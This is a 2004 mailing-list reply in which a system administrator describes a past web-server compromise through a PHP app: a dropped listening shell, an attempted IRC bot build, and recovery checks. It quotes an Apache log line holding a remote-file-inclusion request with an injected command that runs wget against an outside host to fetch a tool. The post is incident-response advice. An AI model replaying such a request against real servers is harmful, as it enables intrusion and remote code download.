My website was hacked! (fwd)
Steve Seremeth
blu_discuss at seremeth.com
Wed Nov 24 23:06:33 EST 2004
David Kramer wrote:
>Anything else I should try?
>
>Should I panic more than I am? Right now I feel strongly this was a
>benign "stupid Apache tricks" thing, and I need to find the hole and close
>it, but no need to nuke the server and start over.
>
>
>
To add to my off-list comments...
I'm a little hazy on the details as this was a while ago, but here's
what we found after the hacker had exploited a _known_ gaping hole in a
php app one of our users was running:
* They had dropped a false shell into /var/tmp that ran under the apache
user -- I think it listened on some funny port - and we discovered it
when we went to bounce apache and got some weird message
* They tried to compile an irc bot (go figure)
* Apache logs had the evidence:
Several instances of this:
./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET
/pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx
HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
DigExt)"
Nasty.
I ran chkrootkit and it didn't find anything. I also did checksums
against a lot of local binaries compared to known good ones to make sure
they were the originals.
I bet you are right that it's an apache-only thing, but I would be
_really_ sure. I would also leave apache (and perhaps other daemons as
well) down until you are sure you found the problem. Our offender came
back once or twice more unsuccessfully.
More information about the Discuss
mailing list